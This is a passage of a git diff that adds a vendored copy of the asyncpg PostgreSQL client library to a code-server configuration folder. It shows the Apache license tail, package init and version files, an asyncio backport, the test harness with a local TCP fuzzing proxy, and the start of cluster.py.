worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright (C) 2016-present the asyncpg authors and contributors + + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/top_level.txt b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/top_level.txt new file mode 100755 index 0000000..5789edd --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg-0.31.0.dist-info/top_level.txt @@ -0,0 +1 @@ +asyncpg diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/__init__.py new file mode 100755 index 0000000..e8811a9 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/__init__.py @@ -0,0 +1,24 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +from .connection import connect, Connection # NOQA +from .exceptions import * # NOQA +from .pool import create_pool, Pool # NOQA +from .protocol import Record # NOQA +from .types import * # NOQA + + +from ._version import __version__ # NOQA + +from . import exceptions + + +__all__: tuple[str, ...] = ( + 'connect', 'create_pool', 'Pool', 'Record', 'Connection' +) +__all__ += exceptions.__all__ # NOQA diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_asyncio_compat.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_asyncio_compat.py new file mode 100755 index 0000000..a211d0a --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_asyncio_compat.py @@ -0,0 +1,94 @@ +# Backports from Python/Lib/asyncio for older Pythons +# +# Copyright (c) 2001-2023 Python Software Foundation; All Rights Reserved +# +# SPDX-License-Identifier: PSF-2.0 + +from __future__ import annotations + +import asyncio +import functools +import sys +import typing + +if typing.TYPE_CHECKING: + from . import compat + +if sys.version_info < (3, 11): + from async_timeout import timeout as timeout_ctx +else: + from asyncio import timeout as timeout_ctx + +_T = typing.TypeVar('_T') + + +async def wait_for(fut: compat.Awaitable[_T], timeout: float | None) -> _T: + """Wait for the single Future or coroutine to complete, with timeout. + + Coroutine will be wrapped in Task. + + Returns result of the Future or coroutine. When a timeout occurs, + it cancels the task and raises TimeoutError. To avoid the task + cancellation, wrap it in shield(). + + If the wait is cancelled, the task is also cancelled. + + If the task supresses the cancellation and returns a value instead, + that value is returned. + + This function is a coroutine. + """ + # The special case for timeout <= 0 is for the following case: + # + # async def test_waitfor(): + # func_started = False + # + # async def func(): + # nonlocal func_started + # func_started = True + # + # try: + # await asyncio.wait_for(func(), 0) + # except asyncio.TimeoutError: + # assert not func_started + # else: + # assert False + # + # asyncio.run(test_waitfor()) + + if timeout is not None and timeout <= 0: + fut = asyncio.ensure_future(fut) + + if fut.done(): + return fut.result() + + await _cancel_and_wait(fut) + try: + return fut.result() + except asyncio.CancelledError as exc: + raise TimeoutError from exc + + async with timeout_ctx(timeout): + return await fut + + +async def _cancel_and_wait(fut: asyncio.Future[_T]) -> None: + """Cancel the *fut* future or task and wait until it completes.""" + + loop = asyncio.get_running_loop() + waiter = loop.create_future() + cb = functools.partial(_release_waiter, waiter) + fut.add_done_callback(cb) + + try: + fut.cancel() + # We cannot wait on *fut* directly to make + # sure _cancel_and_wait itself is reliably cancellable. + await waiter + finally: + fut.remove_done_callback(cb) + + +def _release_waiter(waiter: asyncio.Future[typing.Any], *args: object) -> None: + if not waiter.done(): + waiter.set_result(None) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/__init__.py new file mode 100755 index 0000000..95775e1 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/__init__.py @@ -0,0 +1,543 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import asyncio +import atexit +import contextlib +import functools +import inspect +import logging +import os +import re +import textwrap +import time +import traceback +import unittest + + +import asyncpg +from asyncpg import cluster as pg_cluster +from asyncpg import connection as pg_connection +from asyncpg import pool as pg_pool + +from . import fuzzer + + +@contextlib.contextmanager +def silence_asyncio_long_exec_warning(): + def flt(log_record): + msg = log_record.getMessage() + return not msg.startswith('Executing ') + + logger = logging.getLogger('asyncio') + logger.addFilter(flt) + try: + yield + finally: + logger.removeFilter(flt) + + +def with_timeout(timeout): + def wrap(func): + func.__timeout__ = timeout + return func + + return wrap + + +class TestCaseMeta(type(unittest.TestCase)): + TEST_TIMEOUT = None + + @staticmethod + def _iter_methods(bases, ns): + for base in bases: + for methname in dir(base): + if not methname.startswith('test_'): + continue + + meth = getattr(base, methname) + if not inspect.iscoroutinefunction(meth): + continue + + yield methname, meth + + for methname, meth in ns.items(): + if not methname.startswith('test_'): + continue + + if not inspect.iscoroutinefunction(meth): + continue + + yield methname, meth + + def __new__(mcls, name, bases, ns): + for methname, meth in mcls._iter_methods(bases, ns): + @functools.wraps(meth) + def wrapper(self, *args, __meth__=meth, **kwargs): + coro = __meth__(self, *args, **kwargs) + timeout = getattr(__meth__, '__timeout__', mcls.TEST_TIMEOUT) + if timeout: + coro = asyncio.wait_for(coro, timeout) + try: + self.loop.run_until_complete(coro) + except asyncio.TimeoutError: + raise self.failureException( + 'test timed out after {} seconds'.format( + timeout)) from None + else: + self.loop.run_until_complete(coro) + ns[methname] = wrapper + + return super().__new__(mcls, name, bases, ns) + + +class TestCase(unittest.TestCase, metaclass=TestCaseMeta): + + @classmethod + def setUpClass(cls): + if os.environ.get('USE_UVLOOP'): + import uvloop + asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) + + loop = asyncio.new_event_loop() + asyncio.set_event_loop(None) + cls.loop = loop + + @classmethod + def tearDownClass(cls): + cls.loop.close() + asyncio.set_event_loop(None) + + def setUp(self): + self.loop.set_exception_handler(self.loop_exception_handler) + self.__unhandled_exceptions = [] + + def tearDown(self): + excs = [] + for exc in self.__unhandled_exceptions: + if isinstance(exc, ConnectionResetError): + texc = traceback.TracebackException.from_exception( + exc, lookup_lines=False) + if texc.stack[-1].name == "_call_connection_lost": + # On Windows calling socket.shutdown may raise + # ConnectionResetError, which happens in the + # finally block of _call_connection_lost. + continue + excs.append(exc) + + if excs: + formatted = [] + + for i, context in enumerate(excs): + formatted.append(self._format_loop_exception(context, i + 1)) + + self.fail( + 'unexpected exceptions in asynchronous code:\n' + + '\n'.join(formatted)) + + @contextlib.contextmanager + def assertRunUnder(self, delta): + st = time.monotonic() + try: + yield + finally: + elapsed = time.monotonic() - st + if elapsed > delta: + raise AssertionError( + 'running block took {:0.3f}s which is longer ' + 'than the expected maximum of {:0.3f}s'.format( + elapsed, delta)) + + @contextlib.contextmanager + def assertLoopErrorHandlerCalled(self, msg_re: str): + contexts = [] + + def handler(loop, ctx): + contexts.append(ctx) + + old_handler = self.loop.get_exception_handler() + self.loop.set_exception_handler(handler) + try: + yield + + for ctx in contexts: + msg = ctx.get('message') + if msg and re.search(msg_re, msg): + return + + raise AssertionError( + 'no message matching {!r} was logged with ' + 'loop.call_exception_handler()'.format(msg_re)) + + finally: + self.loop.set_exception_handler(old_handler) + + def loop_exception_handler(self, loop, context): + self.__unhandled_exceptions.append(context) + loop.default_exception_handler(context) + + def _format_loop_exception(self, context, n): + message = context.get('message', 'Unhandled exception in event loop') + exception = context.get('exception') + if exception is not None: + exc_info = (type(exception), exception, exception.__traceback__) + else: + exc_info = None + + lines = [] + for key in sorted(context): + if key in {'message', 'exception'}: + continue + value = context[key] + if key == 'source_traceback': + tb = ''.join(traceback.format_list(value)) + value = 'Object created at (most recent call last):\n' + value += tb.rstrip() + else: + try: + value = repr(value) + except Exception as ex: + value = ('Exception in __repr__ {!r}; ' + 'value type: {!r}'.format(ex, type(value))) + lines.append('[{}]: {}\n\n'.format(key, value)) + + if exc_info is not None: + lines.append('[exception]:\n') + formatted_exc = textwrap.indent( + ''.join(traceback.format_exception(*exc_info)), ' ') + lines.append(formatted_exc) + + details = textwrap.indent(''.join(lines), ' ') + return '{:02d}. {}:\n{}\n'.format(n, message, details) + + +_default_cluster = None + + +def _init_cluster(ClusterCls, cluster_kwargs, initdb_options=None): + cluster = ClusterCls(**cluster_kwargs) + cluster.init(**(initdb_options or {})) + cluster.trust_local_connections() + atexit.register(_shutdown_cluster, cluster) + return cluster + + +def _get_initdb_options(initdb_options=None): + if not initdb_options: + initdb_options = {} + else: + initdb_options = dict(initdb_options) + + # Make the default superuser name stable. + if 'username' not in initdb_options: + initdb_options['username'] = 'postgres' + + return initdb_options + + +def _init_default_cluster(initdb_options=None): + global _default_cluster + + if _default_cluster is None: + pg_host = os.environ.get('PGHOST') + if pg_host: + # Using existing cluster, assuming it is initialized and running + _default_cluster = pg_cluster.RunningCluster() + else: + _default_cluster = _init_cluster( + pg_cluster.TempCluster, + cluster_kwargs={ + "data_dir_suffix": ".apgtest", + }, + initdb_options=_get_initdb_options(initdb_options), + ) + + return _default_cluster + + +def _shutdown_cluster(cluster): + if cluster.get_status() == 'running': + cluster.stop() + if cluster.get_status() != 'not-initialized': + cluster.destroy() + + +def create_pool(dsn=None, *, + min_size=10, + max_size=10, + max_queries=50000, + max_inactive_connection_lifetime=60.0, + connect=None, + setup=None, + init=None, + loop=None, + pool_class=pg_pool.Pool, + connection_class=pg_connection.Connection, + record_class=asyncpg.Record, + **connect_kwargs): + return pool_class( + dsn, + min_size=min_size, + max_size=max_size, + max_queries=max_queries, + loop=loop, + connect=connect, + setup=setup, + init=init, + max_inactive_connection_lifetime=max_inactive_connection_lifetime, + connection_class=connection_class, + record_class=record_class, + **connect_kwargs, + ) + + +class ClusterTestCase(TestCase): + @classmethod + def get_server_settings(cls): + settings = { + 'log_connections': 'on' + } + + if cls.cluster.get_pg_version() >= (11, 0): + # JITting messes up timing tests, and + # is not essential for testing. + settings['jit'] = 'off' + + return settings + + @classmethod + def new_cluster(cls, ClusterCls, *, cluster_kwargs={}, initdb_options={}): + cluster = _init_cluster(ClusterCls, cluster_kwargs, + _get_initdb_options(initdb_options)) + cls._clusters.append(cluster) + return cluster + + @classmethod + def start_cluster(cls, cluster, *, server_settings={}): + cluster.start(port='dynamic', server_settings=server_settings) + + @classmethod + def setup_cluster(cls): + cls.cluster = _init_default_cluster() + + if cls.cluster.get_status() != 'running': + cls.cluster.start( + port='dynamic', server_settings=cls.get_server_settings()) + + @classmethod + def setUpClass(cls): + super().setUpClass() + cls._clusters = [] + cls.setup_cluster() + + @classmethod + def tearDownClass(cls): + super().tearDownClass() + for cluster in cls._clusters: + if cluster is not _default_cluster: + cluster.stop() + cluster.destroy() + cls._clusters = [] + + @classmethod + def get_connection_spec(cls, kwargs={}): + conn_spec = cls.cluster.get_connection_spec() + if kwargs.get('dsn'): + conn_spec.pop('host') + conn_spec.update(kwargs) + if not os.environ.get('PGHOST') and not kwargs.get('dsn'): + if 'database' not in conn_spec: + conn_spec['database'] = 'postgres' + if 'user' not in conn_spec: + conn_spec['user'] = 'postgres' + return conn_spec + + @classmethod + def connect(cls, **kwargs): + conn_spec = cls.get_connection_spec(kwargs) + return pg_connection.connect(**conn_spec, loop=cls.loop) + + def setUp(self): + super().setUp() + self._pools = [] + + def tearDown(self): + super().tearDown() + for pool in self._pools: + pool.terminate() + self._pools = [] + + def create_pool(self, pool_class=pg_pool.Pool, + connection_class=pg_connection.Connection, **kwargs): + conn_spec = self.get_connection_spec(kwargs) + pool = create_pool(loop=self.loop, pool_class=pool_class, + connection_class=connection_class, **conn_spec) + self._pools.append(pool) + return pool + + +class ProxiedClusterTestCase(ClusterTestCase): + @classmethod + def get_server_settings(cls): + settings = dict(super().get_server_settings()) + settings['listen_addresses'] = '127.0.0.1' + return settings + + @classmethod + def get_proxy_settings(cls): + return {'fuzzing-mode': None} + + @classmethod + def setUpClass(cls): + super().setUpClass() + conn_spec = cls.cluster.get_connection_spec() + host = conn_spec.get('host') + if not host: + host = '127.0.0.1' + elif host.startswith('/'): + host = '127.0.0.1' + cls.proxy = fuzzer.TCPFuzzingProxy( + backend_host=host, + backend_port=conn_spec['port'], + ) + cls.proxy.start() + + @classmethod + def tearDownClass(cls): + cls.proxy.stop() + super().tearDownClass() + + @classmethod + def get_connection_spec(cls, kwargs): + conn_spec = super().get_connection_spec(kwargs) + conn_spec['host'] = cls.proxy.listening_addr + conn_spec['port'] = cls.proxy.listening_port + return conn_spec + + def tearDown(self): + self.proxy.reset() + super().tearDown() + + +def with_connection_options(**options): + if not options: + raise ValueError('no connection options were specified') + + def wrap(func): + func.__connect_options__ = options + return func + + return wrap + + +class ConnectedTestCase(ClusterTestCase): + + def setUp(self): + super().setUp() + + # Extract options set up with `with_connection_options`. + test_func = getattr(self, self._testMethodName).__func__ + opts = getattr(test_func, '__connect_options__', {}) + self.con = self.loop.run_until_complete(self.connect(**opts)) + self.server_version = self.con.get_server_version() + + def tearDown(self): + try: + self.loop.run_until_complete(self.con.close()) + self.con = None + finally: + super().tearDown() + + +class HotStandbyTestCase(ClusterTestCase): + + @classmethod + def setup_cluster(cls): + cls.master_cluster = cls.new_cluster(pg_cluster.TempCluster) + cls.start_cluster( + cls.master_cluster, + server_settings={ + 'max_wal_senders': 10, + 'wal_level': 'hot_standby' + } + ) + + con = None + + try: + con = cls.loop.run_until_complete( + cls.master_cluster.connect( + database='postgres', user='postgres', loop=cls.loop)) + + cls.loop.run_until_complete( + con.execute(''' + CREATE ROLE replication WITH LOGIN REPLICATION + ''')) + + cls.master_cluster.trust_local_replication_by('replication') + + conn_spec = cls.master_cluster.get_connection_spec() + + cls.standby_cluster = cls.new_cluster( + pg_cluster.HotStandbyCluster, + cluster_kwargs={ + 'master': conn_spec, + 'replication_user': 'replication' + } + ) + cls.start_cluster( + cls.standby_cluster, + server_settings={ + 'hot_standby': True + } + ) + + finally: + if con is not None: + cls.loop.run_until_complete(con.close()) + + @classmethod + def get_cluster_connection_spec(cls, cluster, kwargs={}): + conn_spec = cluster.get_connection_spec() + if kwargs.get('dsn'): + conn_spec.pop('host') + conn_spec.update(kwargs) + if not os.environ.get('PGHOST') and not kwargs.get('dsn'): + if 'database' not in conn_spec: + conn_spec['database'] = 'postgres' + if 'user' not in conn_spec: + conn_spec['user'] = 'postgres' + return conn_spec + + @classmethod + def get_connection_spec(cls, kwargs={}): + primary_spec = cls.get_cluster_connection_spec( + cls.master_cluster, kwargs + ) + standby_spec = cls.get_cluster_connection_spec( + cls.standby_cluster, kwargs + ) + return { + 'host': [primary_spec['host'], standby_spec['host']], + 'port': [primary_spec['port'], standby_spec['port']], + 'database': primary_spec['database'], + 'user': primary_spec['user'], + **kwargs + } + + @classmethod + def connect_primary(cls, **kwargs): + conn_spec = cls.get_cluster_connection_spec(cls.master_cluster, kwargs) + return pg_connection.connect(**conn_spec, loop=cls.loop) + + @classmethod + def connect_standby(cls, **kwargs): + conn_spec = cls.get_cluster_connection_spec( + cls.standby_cluster, + kwargs + ) + return pg_connection.connect(**conn_spec, loop=cls.loop) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/fuzzer.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/fuzzer.py new file mode 100755 index 0000000..8874564 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_testbase/fuzzer.py @@ -0,0 +1,306 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import asyncio +import socket +import threading +import typing + +from asyncpg import cluster + + +class StopServer(Exception): + pass + + +class TCPFuzzingProxy: + def __init__(self, *, listening_addr: str='127.0.0.1', + listening_port: typing.Optional[int]=None, + backend_host: str, backend_port: int, + settings: typing.Optional[dict]=None) -> None: + self.listening_addr = listening_addr + self.listening_port = listening_port + self.backend_host = backend_host + self.backend_port = backend_port + self.settings = settings or {} + self.loop = None + self.connectivity = None + self.connectivity_loss = None + self.stop_event = None + self.connections = {} + self.sock = None + self.listen_task = None + + async def _wait(self, work): + work_task = asyncio.ensure_future(work) + stop_event_task = asyncio.ensure_future(self.stop_event.wait()) + + try: + await asyncio.wait( + [work_task, stop_event_task], + return_when=asyncio.FIRST_COMPLETED) + + if self.stop_event.is_set(): + raise StopServer() + else: + return work_task.result() + finally: + if not work_task.done(): + work_task.cancel() + if not stop_event_task.done(): + stop_event_task.cancel() + + def start(self): + started = threading.Event() + self.thread = threading.Thread( + target=self._start_thread, args=(started,)) + self.thread.start() + if not started.wait(timeout=2): + raise RuntimeError('fuzzer proxy failed to start') + + def stop(self): + self.loop.call_soon_threadsafe(self._stop) + self.thread.join() + + def _stop(self): + self.stop_event.set() + + def _start_thread(self, started_event): + self.loop = asyncio.new_event_loop() + asyncio.set_event_loop(self.loop) + + self.connectivity = asyncio.Event() + self.connectivity.set() + self.connectivity_loss = asyncio.Event() + self.stop_event = asyncio.Event() + + if self.listening_port is None: + self.listening_port = cluster.find_available_port() + + self.sock = socket.socket() + self.sock.bind((self.listening_addr, self.listening_port)) + self.sock.listen(50) + self.sock.setblocking(False) + + try: + self.loop.run_until_complete(self._main(started_event)) + finally: + self.loop.close() + + async def _main(self, started_event): + self.listen_task = asyncio.ensure_future(self.listen()) + # Notify the main thread that we are ready to go. + started_event.set() + try: + await self.listen_task + finally: + for c in list(self.connections): + c.close() + await asyncio.sleep(0.01) + if hasattr(self.loop, 'remove_reader'): + self.loop.remove_reader(self.sock.fileno()) + self.sock.close() + + async def listen(self): + while True: + try: + client_sock, _ = await self._wait( + self.loop.sock_accept(self.sock)) + + backend_sock = socket.socket() + backend_sock.setblocking(False) + + await self._wait(self.loop.sock_connect( + backend_sock, (self.backend_host, self.backend_port))) + except StopServer: + break + + conn = Connection(client_sock, backend_sock, self) + conn_task = self.loop.create_task(conn.handle()) + self.connections[conn] = conn_task + + def trigger_connectivity_loss(self): + self.loop.call_soon_threadsafe(self._trigger_connectivity_loss) + + def _trigger_connectivity_loss(self): + self.connectivity.clear() + self.connectivity_loss.set() + + def restore_connectivity(self): + self.loop.call_soon_threadsafe(self._restore_connectivity) + + def _restore_connectivity(self): + self.connectivity.set() + self.connectivity_loss.clear() + + def reset(self): + self.restore_connectivity() + + def _close_connection(self, connection): + conn_task = self.connections.pop(connection, None) + if conn_task is not None: + conn_task.cancel() + + def close_all_connections(self): + for conn in list(self.connections): + self.loop.call_soon_threadsafe(self._close_connection, conn) + + +class Connection: + def __init__(self, client_sock, backend_sock, proxy): + self.client_sock = client_sock + self.backend_sock = backend_sock + self.proxy = proxy + self.loop = proxy.loop + self.connectivity = proxy.connectivity + self.connectivity_loss = proxy.connectivity_loss + self.proxy_to_backend_task = None + self.proxy_from_backend_task = None + self.is_closed = False + + def close(self): + if self.is_closed: + return + + self.is_closed = True + + if self.proxy_to_backend_task is not None: + self.proxy_to_backend_task.cancel() + self.proxy_to_backend_task = None + + if self.proxy_from_backend_task is not None: + self.proxy_from_backend_task.cancel() + self.proxy_from_backend_task = None + + self.proxy._close_connection(self) + + async def handle(self): + self.proxy_to_backend_task = asyncio.ensure_future( + self.proxy_to_backend()) + + self.proxy_from_backend_task = asyncio.ensure_future( + self.proxy_from_backend()) + + try: + await asyncio.wait( + [self.proxy_to_backend_task, self.proxy_from_backend_task], + return_when=asyncio.FIRST_COMPLETED) + + finally: + if self.proxy_to_backend_task is not None: + self.proxy_to_backend_task.cancel() + + if self.proxy_from_backend_task is not None: + self.proxy_from_backend_task.cancel() + + # Asyncio fails to properly remove the readers and writers + # when the task doing recv() or send() is cancelled, so + # we must remove the readers and writers manually before + # closing the sockets. + self.loop.remove_reader(self.client_sock.fileno()) + self.loop.remove_writer(self.client_sock.fileno()) + self.loop.remove_reader(self.backend_sock.fileno()) + self.loop.remove_writer(self.backend_sock.fileno()) + + self.client_sock.close() + self.backend_sock.close() + + async def _read(self, sock, n): + read_task = asyncio.ensure_future( + self.loop.sock_recv(sock, n)) + conn_event_task = asyncio.ensure_future( + self.connectivity_loss.wait()) + + try: + await asyncio.wait( + [read_task, conn_event_task], + return_when=asyncio.FIRST_COMPLETED) + + if self.connectivity_loss.is_set(): + return None + else: + return read_task.result() + finally: + if not self.loop.is_closed(): + if not read_task.done(): + read_task.cancel() + if not conn_event_task.done(): + conn_event_task.cancel() + + async def _write(self, sock, data): + write_task = asyncio.ensure_future( + self.loop.sock_sendall(sock, data)) + conn_event_task = asyncio.ensure_future( + self.connectivity_loss.wait()) + + try: + await asyncio.wait( + [write_task, conn_event_task], + return_when=asyncio.FIRST_COMPLETED) + + if self.connectivity_loss.is_set(): + return None + else: + return write_task.result() + finally: + if not self.loop.is_closed(): + if not write_task.done(): + write_task.cancel() + if not conn_event_task.done(): + conn_event_task.cancel() + + async def proxy_to_backend(self): + buf = None + + try: + while True: + await self.connectivity.wait() + if buf is not None: + data = buf + buf = None + else: + data = await self._read(self.client_sock, 4096) + if data == b'': + break + if self.connectivity_loss.is_set(): + if data: + buf = data + continue + await self._write(self.backend_sock, data) + + except ConnectionError: + pass + + finally: + if not self.loop.is_closed(): + self.loop.call_soon(self.close) + + async def proxy_from_backend(self): + buf = None + + try: + while True: + await self.connectivity.wait() + if buf is not None: + data = buf + buf = None + else: + data = await self._read(self.backend_sock, 4096) + if data == b'': + break + if self.connectivity_loss.is_set(): + if data: + buf = data + continue + await self._write(self.client_sock, data) + + except ConnectionError: + pass + + finally: + if not self.loop.is_closed(): + self.loop.call_soon(self.close) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_version.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_version.py new file mode 100755 index 0000000..55a4fbf --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/_version.py @@ -0,0 +1,17 @@ +# This file MUST NOT contain anything but the __version__ assignment. +# +# When making a release, change the value of __version__ +# to an appropriate value, and open a pull request against +# the correct branch (master if making a new feature release). +# The commit message MUST contain a properly formatted release +# log, and the commit must be signed. +# +# The release automation will: build and test the packages for the +# supported platforms, publish the packages on PyPI, merge the PR +# to the target branch, create a Git tag pointing to the commit. + +from __future__ import annotations + +import typing + +__version__: typing.Final = '0.31.0' diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cluster.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cluster.py new file mode 100755 index 0000000..606c2ea --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cluster.py @@ -0,0 +1,729 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import asyncio +import os +import os.path +import platform +import random +import re +import shutil +import socket +import string +import subprocess +import sys +import tempfile +import textwrap +import time + +import asyncpg +from asyncpg import serverversion + + +_system = platform.uname().system + +if _system == 'Windows': + def platform_exe(name): + if name.endswith('.exe'): + return name + return name + '.exe' +else: + def platform_exe(name): + return name + + +def find_available_port(): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.bind(('127.0.0.1', 0)) + return sock.getsockname()[1] + except Exception: + return None + finally: + sock.close() + + +def _world_readable_mkdtemp(suffix=None, prefix=None, dir=None): + name = "".join(random.choices(string.ascii_lowercase, k=8)) + if dir is None: + dir = tempfile.gettempdir() + if prefix is None: + prefix = tempfile.gettempprefix() + if suffix is None: + suffix = "" + fn = os.path.join(dir, prefix + name + suffix) + os.mkdir(fn, 0o755) + return fn + + +def _mkdtemp(suffix=None, prefix=None, dir=None): + if _system == 'Windows' and os.environ.get("GITHUB_ACTIONS"): + # Due to mitigations introduced in python/cpython#118486 + # when Python runs in a session created via an SSH connection + # tempfile.mkdtemp creates directories that are not accessible. + return _world_readable_mkdtemp(suffix, prefix, dir) + else: + return tempfile.mkdtemp(suffix, prefix, dir) + + +class ClusterError(Exception): + pass + + +class Cluster: + def __init__(self, data_dir, *, pg_config_path=None): + self._data_dir = data_dir + self._pg_config_path = pg_config_path + self._pg_bin_dir = ( + os.environ.get('PGINSTALLATION') + or os.environ.get('PGBIN') + ) + self._pg_ctl = None + self._daemon_pid = None + self._daemon_process = None + self._connection_addr = None + self._connection_spec_override = None + + def get_pg_version(self): + return self._pg_version + + def is_managed(self): + return True + + def get_data_dir(self): + return self._data_dir + + def get_status(self): + if self._pg_ctl is None: + self._init_env() + + process = subprocess.run( + [self._pg_ctl, 'status', '-D', self._data_dir], + stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.stdout, process.stderr + + if (process.returncode == 4 or not os.path.exists(self._data_dir) or + not os.listdir(self._data_dir)): + return 'not-initialized' + elif process.returncode == 3: + return 'stopped' + elif process.returncode == 0: + r = re.match(r'.*PID\s?:\s+(\d+).*', stdout.decode()) + if not r: + raise ClusterError( + 'could not parse pg_ctl status output: {}'.format( + stdout.decode())) + self._daemon_pid = int(r.group(1)) + return self._test_connection(timeout=0) + else: + raise ClusterError( + 'pg_ctl status exited with status {:d}: {}'.format( + process.returncode, stderr)) + + async def connect(self, loop=None, **kwargs): + conn_info = self.get_connection_spec() + conn_info.update(kwargs) + return await asyncpg.connect(loop=loop, **conn_info) + + def init(self, **settings): + """Initialize cluster.""" + if self.get_status() != 'not-initialized': + raise ClusterError( + 'cluster in {!r} has already been initialized'.format( + self._data_dir)) + + settings = dict(settings) + if 'encoding' not in 